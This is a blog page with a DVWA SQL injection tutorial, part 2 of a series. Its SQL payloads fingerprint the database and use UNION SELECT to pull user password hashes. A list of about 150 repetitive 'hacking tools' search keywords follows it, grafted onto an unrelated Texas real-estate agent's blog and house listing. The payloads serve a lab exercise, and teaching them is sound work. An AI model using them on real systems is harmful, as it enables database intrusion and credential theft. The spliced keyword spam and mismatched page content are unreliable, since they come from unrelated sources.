Twitter Updates

    follow me on Twitter

    List for 4.5% and get 1% cash back on your purchase

    Sunday, January 28, 2024

    Learning Web Pentesting With DVWA Part 2: SQL Injection

    In the last article Learning Web Pentesting With DVWA Part 1: Installation, you were given a glimpse of SQL injection when we installed the DVWA app. In this article we will explain what we did at the end of that article and much more.
    Lets start by defining what SQL injection is, OWASP defines it as: "A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands."
    Which basically means that we can use a simple (vulnerable) input field in our web application to get information from the database of the server which hosts the web application. We can command and control (at certain times) the database of the web application or even the server.
    In this article we are going to perform SQL injection attack on DVWA, so let's jump in. On the DVWA welcome page click on SQL Injection navigation link. We are presented with a page with an input field for User ID.
    Now lets try to input a value like 1 in the input field. We can see a response from server telling us the firstname and surname of the user associated with User ID 1.
    If we try to enter a user id which doesn't exist, we get no data back from the server. To determine whether an input field is vulnerable to SQL injection, we first start by sending a single quote (') as input. Which returns an SQL error.
    We saw this in the previous article and we also talked about injection point in it. Before diving deeper into how this vulnerability can be exploited lets try to understand how this error might have occurred. Lets try to build the SQL query that the server might be trying to execute. Say the query looks something like this:
    SELECT first_name, sur_name FROM users WHERE user_id = '1';
    The 1 in this query is the value supplied by the user in the User ID input field. When we input a single quote in the User ID input field, the query looks like this:
    SELECT first_name, sur_name FROM users WHERE user_id = '''; 
    The quotes around the input provided in the User ID input field are from the server side application code. The error is due to the extra single quote present in the query. Now if we specify a comment after the single quote like this:
    '-- -
    or
    '#
    we should get no error. Now our crafted query looks like this:
    SELECT first_name, sur_name FROM users WHERE user_id = ''-- -'; 
    or
    SELECT first_name, sur_name FROM users WHERE user_id = ''#'; 
    since everything after the # or -- - are commented out, the query will ignore the extra single quote added by the server side app and whatever comes after it and will not generate any error. However the query returns nothing because we specified nothing ('') as the user_id.
    After knowing how things might be working on the server side, we will start to attack the application.
    First of all we will try to determine the number of columns that the query outputs because if we try a query which will output the number of columns greater or smaller than what the original query outputs then our query is going to get an error. So we will first figure out the exact number of columns that the query outputs and we will do that with the help of order by sql statement like this:
    ' order by 1-- - 
    This MySQL server might execute the query as:
    SELECT first_name, sur_name FROM users WHERE user_id = '' order by 1-- -'; 
    you get the idea now.
    if we don't get any error message, we will increase the number to 2 like this:
    ' order by 2-- - 
    still no error message, lets add another:
    ' order by 3-- - 
    and there we go we have an error message. Which tells us the number of columns that the server query selects is 2 because it erred out at 3.
    Now lets use the union select SQL statement to get information about the database itself.
    ' union select null, version()-- - 
    You should first understand what a union select statement does and only then can you understand what we are doing here. You can read about it here.
    We have used null as one column since we need to match the number of columns from the server query which is two. null will act as a dummy column here which will give no output and the second column which in our case here is the version() command will output the database version. Notice the output from the application, nothing is shown for First name since we specified null for it and the maria db version will be displayed in Surname.
    Now lets check who the database user is using the user() function of mariadb:
    ' union select null, user()-- - 
    After clicking the submit button you should be able to see the user of the database in surname.

    Now lets get some information about the databases in the database.
    Lets determine the names of databases from INFORMATION_SCHEMA.SCHEMATA by entering following input in the User ID field:
    ' union select null, SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA-- - 
    This lists two databases dvwa and information_schema. information_schema is the built in database. Lets look at the dvwa database.
    Get table names for dvwa database from INFORMATION_SCHEMA.TABLES
    ' union select null, TABLE_NAME from INFORMATION_SCHEMA.TABLES-- - 
    It gives a huge number of tables that are present in dvwa database. But what we are really interested in is the users table as it is most likely to contain user passwords. But first we need to determine columns of that table and we will do that by querying INFORMATION_SCHEMA.COLUMNS like this:
    ' union select null, COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users'-- - 

    We can see the password column in the output now lets get those passwords:
    ' union select user, password from users-- - 
    Of-course those are the hashes and not plain text passwords. You need to crack them.
    Hope you learned something about SQL injection in this article. See you next time.

    References:

    1. SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
    2. MySQL UNION: https://www.mysqltutorial.org/sql-union-mysql.aspx
    3. Chapter 25 INFORMATION_SCHEMA Tables: https://dev.mysql.com/doc/refman/8.0/en/information-schema.html
    Related word
    1. How To Make Hacking Tools
    2. Hacking Tools 2020
    3. Nsa Hack Tools Download
    4. Hacking Tools Software
    5. Physical Pentest Tools
    6. Hacks And Tools
    7. Pentest Tools Windows
    8. Github Hacking Tools
    9. Hacker Tools Online
    10. Hacker Tool Kit
    11. Hack Tools
    12. Best Hacking Tools 2020
    13. Nsa Hacker Tools
    14. Pentest Tools Online
    15. Hacker Tools For Windows
    16. Hacker Tools For Mac
    17. Hacks And Tools
    18. Hacking Tools Usb
    19. Pentest Tools Alternative
    20. Black Hat Hacker Tools
    21. Hacking Tools For Windows
    22. Game Hacking
    23. Nsa Hack Tools Download
    24. Pentest Tools Website Vulnerability
    25. Tools Used For Hacking
    26. Hack Tools For Pc
    27. Hackers Toolbox
    28. Github Hacking Tools
    29. Hack Rom Tools
    30. Game Hacking
    31. Pentest Tools Android
    32. Install Pentest Tools Ubuntu
    33. Pentest Recon Tools
    34. Hack Tools
    35. Hacker Tools For Pc
    36. Hacker Search Tools
    37. Pentest Tools Github
    38. Pentest Tools Online
    39. Pentest Tools Kali Linux
    40. Hack Tool Apk No Root
    41. Install Pentest Tools Ubuntu
    42. Hacking Tools For Kali Linux
    43. Pentest Tools Url Fuzzer
    44. Hacking Tools Name
    45. How To Hack
    46. Pentest Tools List
    47. Install Pentest Tools Ubuntu
    48. Hacker Tools Mac
    49. How To Install Pentest Tools In Ubuntu
    50. Hack Tools For Windows
    51. Pentest Tools Linux
    52. Hack Website Online Tool
    53. What Are Hacking Tools
    54. Hacker Tools
    55. Github Hacking Tools
    56. Hacking Tools Free Download
    57. Hacking Tools Windows 10
    58. Nsa Hack Tools Download
    59. Bluetooth Hacking Tools Kali
    60. Hack Tools
    61. Pentest Tools Linux
    62. Hacker Techniques Tools And Incident Handling
    63. Install Pentest Tools Ubuntu
    64. Tools 4 Hack
    65. Hack Tools
    66. Hackers Toolbox
    67. What Is Hacking Tools
    68. Hacker Tools Linux
    69. Hack Tools For Pc
    70. Hacking Tools Free Download
    71. Hacker Tools For Ios
    72. Hacker Tools Apk Download
    73. Hack Rom Tools
    74. Tools Used For Hacking
    75. Hacking Tools For Windows 7
    76. What Are Hacking Tools
    77. Hack Apps
    78. Pentest Tools Tcp Port Scanner
    79. Hacking Apps
    80. Hacker Tool Kit
    81. Pentest Tools Nmap
    82. Hacker Tools Linux
    83. Hack Tools For Ubuntu
    84. Pentest Tools Download
    85. Tools For Hacker
    86. Hacking App
    87. Hacker Security Tools
    88. What Are Hacking Tools
    89. Best Pentesting Tools 2018
    90. Pentest Tools For Ubuntu
    91. Hack Tools 2019
    92. Hacking Tools Pc
    93. Hacker Tools For Ios
    94. Hacking Tools Usb
    95. Pentest Tools Subdomain
    96. How To Install Pentest Tools In Ubuntu
    97. Hack Tools Mac
    98. Hacker Tools For Windows
    99. Android Hack Tools Github
    100. Hacking Tools Windows
    101. Hacking Tools For Windows 7
    102. Pentest Tools Url Fuzzer
    103. Pentest Tools Download
    104. Top Pentest Tools
    105. Pentest Tools Download
    106. Hack Tools For Windows
    107. What Are Hacking Tools
    108. Hacking Tools Mac
    109. Hacker Tools For Mac
    110. Hacker Tools For Mac
    111. Hacking Tools Name
    112. Hack Apps
    113. Hacking Tools Software
    114. Pentest Tools For Android
    115. Hacking Tools 2020
    116. Pentest Tools Tcp Port Scanner
    117. Hacker Tools For Ios
    118. Tools For Hacker
    119. Best Hacking Tools 2019
    120. Hacker Tools Apk Download
    121. Pentest Tools Framework
    122. Hack Tool Apk
    123. Hacker Tools For Ios
    124. New Hack Tools
    125. Pentest Tools Framework
    126. How To Hack
    127. Android Hack Tools Github
    128. Hacking Tools Windows 10
    129. Termux Hacking Tools 2019
    130. Pentest Tools Tcp Port Scanner
    131. Blackhat Hacker Tools
    132. Game Hacking
    133. Hacking Tools
    134. Hacker Security Tools
    135. Termux Hacking Tools 2019
    136. Github Hacking Tools
    137. Pentest Tools Nmap
    138. Bluetooth Hacking Tools Kali
    139. Hack Tool Apk No Root
    140. Hacker Techniques Tools And Incident Handling
    141. Computer Hacker
    142. Hack Tools For Windows
    143. Hacking Tools Pc
    144. Nsa Hack Tools
    145. Usb Pentest Tools
    146. Hacking App
    147. Hacks And Tools
    148. Nsa Hack Tools
    149. Hacker Tools Mac
    150. Hacking Tools Software

    No comments:

    Post a Comment

    Home for sale- $2,000 rebate!

    Ready Real Estate slide show

    Become a fan of my page

    Sheree Dutton, Reatlor, DFW, Texas on Facebook
    Powered By Blogger

    Pandora Faves

    Back on the market, price reduced, 1% cash back rebate offered

    Sheree Dutton | Ready Real Estate | 817-975-0461
    222 Birchwood, Azle, TX
    Back on the market, price reduced and 15 cash back rebate offered!
    3BR/2BA Single Family House
    offered at $102,500
    Year Built 2006
    Sq Footage 1,142
    Bedrooms 3
    Bathrooms 2 full, 0 partial
    Floors 1
    Parking 3 Covered spaces
    Lot Size .225 acres
    HOA/Maint $0 per month

    DESCRIPTION


    Wow, talk about pride of ownership! This house has too many upgrades to count, and is so well cared for. You must see it to believe it! A lot of value in this perfect starter home.

    OPEN HOUSE SUNDAY MAY 3RD 2+5 pm

    see additional photos below
    PROPERTY FEATURES

    - Central A/C - Central heat - Fireplace
    - High/Vaulted ceiling - Walk-in closet - Tile floor
    - Living room - Breakfast nook - Dishwasher
    - Refrigerator - Stove/Oven - Microwave
    - Laundry area - inside - Balcony, Deck, or Patio - Yard

    OTHER SPECIAL FEATURES

    - 1 car garage, covered carport for 2 cars
    - covered wood deck in backyard
    - gutters
    - storage shed
    - newly stained wood fence
    - electric fireplace added, with tile hearth
    - upgraded ceiling fans and light fixtures
    - island in kitchen

    ADDITIONAL PHOTOS


    Fantastic curb appeal

    covered wood deck in back

    living room

    kitchen with island

    breakfast nook

    master bedroom
    Contact info:
    Sheree Dutton
    Ready Real Estate
    817-975-0461
    For sale by agent/broker

    powered by postlets Equal Opportunity Housing
    Posted: Sep 11, 2009, 7:31am PDT

    Blog Archive